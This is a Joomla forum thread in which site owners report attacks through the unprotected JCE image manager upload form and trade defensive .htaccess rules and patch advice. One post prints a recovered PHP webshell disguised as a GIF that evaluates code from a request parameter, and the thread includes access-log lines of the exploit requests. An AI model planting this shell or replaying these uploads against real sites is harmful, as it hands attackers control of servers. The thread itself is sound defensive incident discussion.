Story about JCE and hack attempt

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
User avatar
ahmad
Joomla! Guru
Joomla! Guru
Posts: 902
Joined: Fri Apr 07, 2006 4:02 pm
Location: Egypt
Contact:

Story about JCE and hack attempt

Post by ahmad » Mon Aug 27, 2012 10:16 am

Greetings,

I am sharing what I've experienced today and the way I was thinking and analyzing so excuse me if it's a long post ...

I am on a dedicated machine protected by a firewall, proxy and a powerful enterprise anti-virus software. There's no access to the administration and no way for a user to login except through a VPN.

Today the anti-virus detected a 'php_rc57shell' malware. Quick research shown that this is another shell script being used to take control over the files/db ... etc. I checked the access logs and found a POST request matching the time when the anti-virus stopped the file:

Code: Select all

POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 10 "-" "BOT/0.1 (BOT for JCE)"
As shown it's calling com_jce and the imgmanager plugin. So, maybe a user tried to upload some malicious file? is it a hacking attempt? This is a pretty normal request present in everyday's log but :
  • 1- It wasn't in the regular working hours our users used to work.
    2- This was the first time this IP address visit the site!
I opened the browser and tried to access this URL directly. I am not logged in so I thought I will get an error or something. I was surprised because the page flashed for a second with the title saying 'Image Manager : 1.5.7.11' then it was redirected to the homepage! I viewed the source and found the image manager upload form waiting for an input.

Now it makes perfect sense. Someone is trying to upload a shell script having an image extension to pass the upload restriction using the unprotected form. I tried to search if that was reported before and found it. Someone even created a script where you post the URL of the website you want to attack and an the file to make it easy for script kiddies to do it :

Image

I am using an old version of JCE. We were planning to upgrade but we have a lot of user groups and many modifications were done so the schedule didn't fit for an upgrade and test yet.

I am using :
JCE version : 1.5.7.11
Image Manager version : 1.5.7.11

Edit : The new versions of JCE redirect directly to the homepage and show an error : You're not authorized to view this resource.

Regards

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Mon Aug 27, 2012 3:48 pm

there have been an awful lot to upgrades between 1.5.7.11 and now, you must have been very busy doing other things.
i suggest you follow checklist 7 safe route to recovery and contact the developer to sort out your "You're not authorized to view this resource." error
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
ahmad
Joomla! Guru
Joomla! Guru
Posts: 902
Joined: Fri Apr 07, 2006 4:02 pm
Location: Egypt
Contact:

Re: Story about JCE and hack attempt

Post by ahmad » Tue Aug 28, 2012 6:49 am

Thankfully, nothing bad happened as the anti-virus stopped the malicious file. Logs show that the user tried to access the file but got a 404. He thought it was uploaded successfully while it wasn't.

The "You're not authorized" message shows up when I try to access the plugin without logging in. So this is a normal behavior not an error :) I was reporting that this was fixed in the newer versions of JCE.

gfisch
Joomla! Apprentice
Joomla! Apprentice
Posts: 16
Joined: Tue Jan 19, 2010 6:11 pm
Location: Montreal, Canada
Contact:

Re: Story about JCE and hack attempt

Post by gfisch » Wed Aug 29, 2012 1:51 pm

Same thing for me!

I was getting rogue redirects added to .htaccess files and written to every directory.
After some digging for suspicious files I found a couple. One example:

Code: Select all

(0)# more ./images/stories/story.php
GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>
Checking apache logs I saw the JCE image manager call three weeks ago:

Code: Select all

91.202.244.73 - - [04/Aug/2012:14:36:25 -0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a798
1f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1 " 200 70 "-" "BOT/0.1 (BOT for JCE)"
91.202.244.73 - - [04/Aug/2012:14:36:26 -0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 2
00 36 "-" "BOT/0.1 (BOT for JCE)"
91.202.244.73 - - [04/Aug/2012:14:36:32 -0400] "GET //images/stories/story.php HTTP/1.1" 200 15 "-" "BOT/0.1 (BOT for JCE)"
Finally updated JCE. Easy to forget about third party software...

User avatar
ahmad
Joomla! Guru
Joomla! Guru
Posts: 902
Joined: Fri Apr 07, 2006 4:02 pm
Location: Egypt
Contact:

Re: Story about JCE and hack attempt

Post by ahmad » Thu Aug 30, 2012 11:59 pm

Yes we learn the lessons the hard way!

mandville you got my message? sorry but it's still in my outbox am sure I sent it

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Fri Aug 31, 2012 3:30 am

the link you provided showed a version
# Vulnerable Version: 2.0.10 (Image Manager 1.5.7.13, Media Manager
1.5.6.3, Template Manager 1.5.5, File Manager 1.5.4.1 & prior versions
also may be affected)
Posted *2011-08-23*

Please check with the developer the latest versions
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

BoardBoss
Joomla! Ace
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 11:41 am

@ahmad Can you publicly or privately share with me the software that stopped this exploit? I got hit with this hack on a server with multiple Joomla accounts, and it changed every username on every account to "sec-w.com", and the passwords were the same for everybody, too. Since the exploit also scanned the server and gave them access to all account names, etc., they would have super user access to every affected Joomla account.

The only account spared from this exploit were those suspended for one reason or another, and one that was intentionally broken for testing purposes. Because the exploit couldn't post into these accounts, they were not affected.

There were two Joomla security scripts in place being evaluated on several accounts, although the account that was exploited did not have one. I am not naming them because of that, and the fact that a shell script that modifies the DB would not (IMHO) be detected by them as that is not really their focus. I could be (and probably am :) ) wrong on this, although since neither of the solutions being tested were installed on the exploited account, I am going to ask in the support forums for both.

Cheers!

User avatar
ahmad
Joomla! Guru
Joomla! Guru
Posts: 902
Joined: Fri Apr 07, 2006 4:02 pm
Location: Egypt
Contact:

Re: Story about JCE and hack attempt

Post by ahmad » Sun Dec 30, 2012 12:46 pm

@BoardBoss you have my sympathy ...

Right now I do not know what is it. Probably this week I will be back with an answer!

BoardBoss
Joomla! Ace
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 12:54 pm

@ahmad Thank you very much in advance for any input you can offer.

User avatar
Slackervaara
Joomla! Ace
Joomla! Ace
Posts: 1047
Joined: Sat Aug 13, 2011 6:27 am

Re: Story about JCE and hack attempt

Post by Slackervaara » Sun Dec 30, 2012 2:29 pm

To change username and password in a table can be done with phpMyAdmin and if you run a certain query. Maybe you could run such query through a script or through SQL injection. If it is injection you could search your access logs for sec-w.com to see if you detects the hack. If it is in a script on your site you could, if you have a copy of your site on your PC use grep and try to find file with sec-w.com.

BoardBoss
Joomla! Ace
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 2:36 pm

Slackervaara wrote:To change username and password in a table can be done with phpMyAdmin and if you run a certain query. Maybe you could run such query through a script or through SQL injection. If it is injection you could search your access logs for sec-w.com to see if you detects the hack. If it is in a script on your site you could, if you have a copy of your site on your PC use grep and try to find file with sec-w.com.
Hi - Thank you for the reply; however, I know that. :)

Think about a Joomla site with 1,000 users. Would you really want to go through and have to manually change all usernames on that site? What if there were 100 such sites on the server? Obviously that would get old in a hurry.

User avatar
Slackervaara
Joomla! Ace
Joomla! Ace
Posts: 1047
Joined: Sat Aug 13, 2011 6:27 am

Re: Story about JCE and hack attempt

Post by Slackervaara » Sun Dec 30, 2012 2:51 pm

I did not suggest that you should change back username and passwords with phpMyadmin instead I was discussing how the hack was made by telling that such changes can be made with phpMyAdmin. So the hacker can have 1 access to your phpMyAdmin 2 SQL injection or 3 script on your site. I guess you can track SQL injection via accesslogs and scripts via grep of your files as I suggested or using JAMSS-script.

BoardBoss
Joomla! Ace
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 3:02 pm

Slackervaara wrote:I did not suggest that you should change back username and passwords with phpMyadmin instead I was discussing how the hack was made by telling that such changes can be made with phpMyAdmin. So the hacker can have 1 access to your phpMyAdmin 2 SQL injection or 3 script on your site. I guess you can track SQL injection via accesslogs and scripts via grep of your files as I suggested or using JAMSS-script.
Hi - No problem. We have already identified the source of the exploit. I do not want to identify it here for obvious reasons; however, it appears that it came through a Joomla 1.5.26 site running an older version of an editor extension. I have seen many exploits and hacks over the years and this one is by far potentially the worst. I will know for sure after it is all healed. :)

User avatar
Slackervaara
Joomla! Ace
Joomla! Ace
Posts: 1047
Joined: Sat Aug 13, 2011 6:27 am

Re: Story about JCE and hack attempt

Post by Slackervaara » Sun Dec 30, 2012 3:29 pm

I use MySQLDumper for backup and restore. MySQLDumper have the feature that one can restore individual tables, which is very good if the users table have been hacked and usernames substituted. It is only for me to restore that table from backup if I get hacked like you just been.

BoardBoss
Joomla! Ace
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 3:42 pm

Slackervaara wrote:I use MySQLDumper for backup and restore. MySQLDumper have the feature that one can restore individual tables, which is very good if the users table have been hacked and usernames substituted. It is only for me to restore that table from backup if I get hacked like you just been.
Hi again. The backup process we utilize allows specific tables to be restored as well. I am more interested in preventing future exploits like this as I have better things to do. I am starting by implementing my own termination of support for Joomla 1.5.x. :)

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Sun Dec 30, 2012 5:03 pm

moderator comment
please keep on topic and not divert into the pros and cons of different methods of backup/restore beyond the fix to this issue.
Would posters please read the full topic and not the last few posts to prevent embarrassment and confusion
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

BoardBoss
Joomla! Ace
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 5:18 pm

mandville wrote:moderator comment
please keep on topic and not divert into the pros and cons of different methods of backup/restore beyond the fix to this issue.
Would posters please read the full topic and not the last few posts to prevent embarrassment and confusion
Thank you, Mandville. Timely and right on target, as usual. :)

Codelizard
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Wed Jan 02, 2013 1:05 am

Re: Story about JCE and hack attempt

Post by Codelizard » Wed Jan 02, 2013 5:50 am

ahmad wrote:
Today the anti-virus detected a 'php_rc57shell' malware.
I'd love to know what you are running that caught this. What anti-virus?

User avatar
jbourque
Joomla! Apprentice
Joomla! Apprentice
Posts: 9
Joined: Sun Aug 09, 2009 2:47 am
Location: Missouri
Contact:

Re: Story about JCE and hack attempt

Post by jbourque » Wed Jan 23, 2013 10:51 pm

I have installed Exploit Scanner from ConfigServer on one of my servers and it actively monitors files uploaded to my server. It runs ClamAV which if a virus is found will automatically quarantine the virus ex. hide.php file and notify me a virus was found. I have been running this for a couple weeks and works amazingly so I just requested to have it installed on my other server.

I am running JCE 2.1.x on many of my sites and I have seen that there is a still an issue with the image manager I just posted on the JCE forum to try and find a resolution to this problem.

So if you are running LINUX and ClamScan it is WORTH the $50 to have Sara install Exploit Scanner on your server for more info check out www.configserver.com

Best of luck
Joseph Bourque
Above Web Media
"Putting your business one click from your customers"
http://www.AboveWebMedia.com

Codelizard
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Wed Jan 02, 2013 1:05 am

Re: Story about JCE and hack attempt

Post by Codelizard » Thu Jan 24, 2013 7:58 am

Thanks so much.

one thing you should add, irregardless, is an .htaccess file in your /images/ folder that disallows any scripts to be run. So, even if a php file DOES get uploaded, it cannot be executed...

KCA
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Feb 17, 2011 8:59 pm

Re: Story about JCE and hack attempt

Post by KCA » Sat Jan 26, 2013 10:28 pm

^^^^ Can you please give an example of what that .htaccess file would look like?
Thanks!

Codelizard
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Wed Jan 02, 2013 1:05 am

Re: Story about JCE and hack attempt

Post by Codelizard » Sun Jan 27, 2013 12:05 am

Put this in your .htaccess file:

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .exe
Options -ExecCGI

that makes it so scripts of those extensions are not allowed to run, and will generate a FORBIDDEN error if tried.

Another thing to consider in the .htaccess, is something like this:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite.com/.*$ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]

The above will not allow anyone to view the images unless they are viewing them as content on "yourwebsite.com". This stops people from linking your images.

Find a good .htaccess tutorial on the web for more options. These are two I use for image folders.

gregzem
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Mon Feb 04, 2013 7:49 pm

Re: Story about JCE and hack attempt

Post by gregzem » Tue Feb 05, 2013 9:16 am

1. add the following .htaccess into ./images/.htaccess folder to prevent php shell running

#####################
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
#####################

2. deny access to /tmp folder by adding ./tmp/.htaccess with the following content

#####################
deny from all
#####################

3. For Joomla 1.5.x I've created a patch which protects against [removed] so you may want to try it

http://revisium.com/download/jce_patch.zip (instruction enclosed with the .zip)

It works perfectly for my joomla websites so try it.
Last edited by mandville on Tue Feb 05, 2013 3:24 pm, edited 1 time in total.
Reason: removed link to exploit site with hacking method. Posting such is Against forum rules

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Tue Feb 05, 2013 3:29 pm

gregzem wrote: 3. For Joomla 1.5.x I've created a patch which protects against [removed] so you may want to try it

moderators comment : downloading and using patch files from un official sources (often pay per fix sites) may have un wanted consequences.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

gregzem
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Mon Feb 04, 2013 7:49 pm

Re: Story about JCE and hack attempt

Post by gregzem » Tue Feb 05, 2013 4:32 pm

1. As far as I know, 1.5.26 is the latest version of Joomla so no new version will be releases and JCE vulnerability will be never resolved. Do you think this is good to keep user without any solution?

2. Patch is 5 lines long so you can easily download and check the source.

Codelizard
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Wed Jan 02, 2013 1:05 am

Re: Story about JCE and hack attempt

Post by Codelizard » Tue Feb 05, 2013 6:00 pm

gregzem wrote:1. As far as I know, 1.5.26 is the latest version of Joomla so no new version will be releases and JCE vulnerability will be never resolved. Do you think this is good to keep user without any solution?

2. Patch is 5 lines long so you can easily download and check the source.

While I agree with the moderator, the patch is indeed only 5 lines long. Basically, if com_jce is called, and the person is NOT a logged in admin or super admin, then they get permission denied. I'll be making this small change, myself.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Story about JCE and hack attempt

Post by PhilD » Tue Feb 05, 2013 7:38 pm

There is a huge range of technical ability on the security forums ranging from none to extensive. While most stuff posted is intended to help, there is a moral obligation for the moderators to warn everyone about use of patches, scripts,etc. from non official sites and that the use of such may cause harm to a site or unintended issues with sites or extensions. Remember, not everyone can (or even wants to) read code and see what it does.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Tue Feb 05, 2013 8:20 pm

has the patch been offered to jce or would they just say upgrade to the latest version as that is safe??
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Rhand
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 213
Joined: Sat Oct 01, 2005 3:09 pm
Location: World
Contact:

Re: Story about JCE and hack attempt

Post by Rhand » Thu Mar 07, 2013 3:29 am

mandville wrote:has the patch been offered to jce or would they just say upgrade to the latest version as that is safe??
This I would like to know as well. I need to either patch this plugin or use a .htaccess block. One site got hacked twice and probably twice using this vulnerability.
CEO Imagewize Ltd: webdesign | web development | branding
website: Imagewize.net

skuran
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Fri Aug 31, 2012 12:49 pm

Re: Story about JCE and hack attempt

Post by skuran » Tue Mar 12, 2013 2:06 pm

I tested this patch and it's working. It is a simple workaround untill all bloody joomla 1.5 content is upgraded. Thanks.


Locked

Return to “Security in Joomla! 1.5”